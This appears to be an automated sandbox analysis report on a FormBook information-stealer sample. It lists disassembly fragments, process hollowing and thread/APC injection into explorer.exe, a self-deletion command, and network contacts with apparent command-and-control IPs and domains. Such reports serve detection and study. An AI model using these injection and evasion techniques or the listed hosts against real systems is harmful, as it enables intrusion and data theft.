Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]	9_2_049C51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]	9_2_049C51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049735A1 mov eax, dword ptr fs:[00000030h]	9_2_049735A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]	9_2_049761A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049761A0 mov eax, dword ptr fs:[00000030h]	9_2_049761A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C69A6 mov eax, dword ptr fs:[00000030h]	9_2_049C69A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6DC9 mov eax, dword ptr fs:[00000030h]	9_2_049C6DC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049F8DF1 mov eax, dword ptr fs:[00000030h]	9_2_049F8DF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0494B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0494B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0494B1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049D41E8 mov eax, dword ptr fs:[00000030h]	9_2_049D41E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0495D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0495D5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]	9_2_04949100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]	9_2_04949100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949100 mov eax, dword ptr fs:[00000030h]	9_2_04949100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18D34 mov eax, dword ptr fs:[00000030h]	9_2_04A18D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04953D34 mov eax, dword ptr fs:[00000030h]	9_2_04953D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494AD30 mov eax, dword ptr fs:[00000030h]	9_2_0494AD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049CA537 mov eax, dword ptr fs:[00000030h]	9_2_049CA537
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]	9_2_04974D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]	9_2_04974D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974D3B mov eax, dword ptr fs:[00000030h]	9_2_04974D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]	9_2_0497513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497513A mov eax, dword ptr fs:[00000030h]	9_2_0497513A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120 mov eax, dword ptr fs:[00000030h]	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04964120 mov ecx, dword ptr fs:[00000030h]	9_2_04964120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04967D50 mov eax, dword ptr fs:[00000030h]	9_2_04967D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]	9_2_0496B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496B944 mov eax, dword ptr fs:[00000030h]	9_2_0496B944
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04983D43 mov eax, dword ptr fs:[00000030h]	9_2_04983D43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C3540 mov eax, dword ptr fs:[00000030h]	9_2_049C3540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]	9_2_0496C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496C577 mov eax, dword ptr fs:[00000030h]	9_2_0496C577
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]	9_2_0494B171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494B171 mov eax, dword ptr fs:[00000030h]	9_2_0494B171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494C962 mov eax, dword ptr fs:[00000030h]	9_2_0494C962
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]	9_2_0497D294
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497D294 mov eax, dword ptr fs:[00000030h]	9_2_0497D294
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04A10EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04A10EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04A10EA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DFE87 mov eax, dword ptr fs:[00000030h]	9_2_049DFE87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0495AAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0495AAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0497FAB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]	9_2_049452A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]	9_2_049452A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]	9_2_049452A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]	9_2_049452A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049452A5 mov eax, dword ptr fs:[00000030h]	9_2_049452A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C46A7 mov eax, dword ptr fs:[00000030h]	9_2_049C46A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049736CC mov eax, dword ptr fs:[00000030h]	9_2_049736CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972ACB mov eax, dword ptr fs:[00000030h]	9_2_04972ACB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049FFEC0 mov eax, dword ptr fs:[00000030h]	9_2_049FFEC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04988EC7 mov eax, dword ptr fs:[00000030h]	9_2_04988EC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972AE4 mov eax, dword ptr fs:[00000030h]	9_2_04972AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049716E0 mov ecx, dword ptr fs:[00000030h]	9_2_049716E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18ED6 mov eax, dword ptr fs:[00000030h]	9_2_04A18ED6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049576E2 mov eax, dword ptr fs:[00000030h]	9_2_049576E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]	9_2_0494AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494AA16 mov eax, dword ptr fs:[00000030h]	9_2_0494AA16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]	9_2_04945210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04945210 mov ecx, dword ptr fs:[00000030h]	9_2_04945210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]	9_2_04945210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04945210 mov eax, dword ptr fs:[00000030h]	9_2_04945210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04963A1C mov eax, dword ptr fs:[00000030h]	9_2_04963A1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]	9_2_0497A61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A61C mov eax, dword ptr fs:[00000030h]	9_2_0497A61C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]	9_2_0494C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]	9_2_0494C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494C600 mov eax, dword ptr fs:[00000030h]	9_2_0494C600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04978E00 mov eax, dword ptr fs:[00000030h]	9_2_04978E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04958A0A mov eax, dword ptr fs:[00000030h]	9_2_04958A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049FFE3F mov eax, dword ptr fs:[00000030h]	9_2_049FFE3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01608 mov eax, dword ptr fs:[00000030h]	9_2_04A01608
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494E620 mov eax, dword ptr fs:[00000030h]	9_2_0494E620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]	9_2_04984A2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04984A2C mov eax, dword ptr fs:[00000030h]	9_2_04984A2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18A62 mov eax, dword ptr fs:[00000030h]	9_2_04A18A62
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049D4257 mov eax, dword ptr fs:[00000030h]	9_2_049D4257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]	9_2_04949240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]	9_2_04949240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]	9_2_04949240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949240 mov eax, dword ptr fs:[00000030h]	9_2_04949240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04957E41 mov eax, dword ptr fs:[00000030h]	9_2_04957E41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0498927A mov eax, dword ptr fs:[00000030h]	9_2_0498927A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]	9_2_0496AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]	9_2_0496AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]	9_2_0496AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]	9_2_0496AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496AE73 mov eax, dword ptr fs:[00000030h]	9_2_0496AE73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495766D mov eax, dword ptr fs:[00000030h]	9_2_0495766D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]	9_2_049FB260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049FB260 mov eax, dword ptr fs:[00000030h]	9_2_049FB260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972397 mov eax, dword ptr fs:[00000030h]	9_2_04972397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04958794 mov eax, dword ptr fs:[00000030h]	9_2_04958794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A15BA5 mov eax, dword ptr fs:[00000030h]	9_2_04A15BA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497B390 mov eax, dword ptr fs:[00000030h]	9_2_0497B390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]	9_2_049C7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]	9_2_049C7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7794 mov eax, dword ptr fs:[00000030h]	9_2_049C7794
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]	9_2_04951B8F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04951B8F mov eax, dword ptr fs:[00000030h]	9_2_04951B8F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049FD380 mov ecx, dword ptr fs:[00000030h]	9_2_049FD380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A0138A mov eax, dword ptr fs:[00000030h]	9_2_04A0138A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]	9_2_04974BAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]	9_2_04974BAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04974BAD mov eax, dword ptr fs:[00000030h]	9_2_04974BAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]	9_2_049C53CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C53CA mov eax, dword ptr fs:[00000030h]	9_2_049C53CA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049837F5 mov eax, dword ptr fs:[00000030h]	9_2_049837F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049703E2 mov eax, dword ptr fs:[00000030h]	9_2_049703E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0496DBE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496F716 mov eax, dword ptr fs:[00000030h]	9_2_0496F716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]	9_2_049DFF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DFF10 mov eax, dword ptr fs:[00000030h]	9_2_049DFF10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]	9_2_0497A70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A70E mov eax, dword ptr fs:[00000030h]	9_2_0497A70E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497E730 mov eax, dword ptr fs:[00000030h]	9_2_0497E730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]	9_2_04A1070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A1070D mov eax, dword ptr fs:[00000030h]	9_2_04A1070D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]	9_2_04944F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04944F2E mov eax, dword ptr fs:[00000030h]	9_2_04944F2E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A0131B mov eax, dword ptr fs:[00000030h]	9_2_04A0131B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18F6A mov eax, dword ptr fs:[00000030h]	9_2_04A18F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494F358 mov eax, dword ptr fs:[00000030h]	9_2_0494F358
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494DB40 mov eax, dword ptr fs:[00000030h]	9_2_0494DB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495EF40 mov eax, dword ptr fs:[00000030h]	9_2_0495EF40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]	9_2_04973B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04973B7A mov eax, dword ptr fs:[00000030h]	9_2_04973B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0494DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0494DB60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495FF60 mov eax, dword ptr fs:[00000030h]	9_2_0495FF60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18B58 mov eax, dword ptr fs:[00000030h]	9_2_04A18B58

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 52.128.23.153 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 202.210.8.86 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.omfgphil.com
Source: C:\Windows\explorer.exe	Network Connect: 156.252.96.189 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.tracisolomon.xyz
Source: C:\Windows\explorer.exe	Network Connect: 34.95.69.141 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.169.145.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.rogegalmish.com
Source: C:\Windows\explorer.exe	Domain query: www.webdomoupravitel.com
Source: C:\Windows\explorer.exe	Domain query: www.drisu-goalkeeping.com
Source: C:\Windows\explorer.exe	Network Connect: 192.232.222.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.shirleyeluiz.com
Source: C:\Windows\explorer.exe	Domain query: www.thepocket-onlinelesson.xyz
Source: C:\Windows\explorer.exe	Network Connect: 64.98.145.30 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.4520oceanviewavenue.com
Source: C:\Windows\explorer.exe	Domain query: www.skynetaccess.com
Source: C:\Windows\explorer.exe	Domain query: www.best-cleaner.com

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Memory written: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1340000

Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Process created: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe C:\Users\user\Desktop\457b22da_by_Libranalysis.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\457b22da_by_Libranalysis.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000002.480271164.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.241521742.0000000001980000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.483140519.0000000003360000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
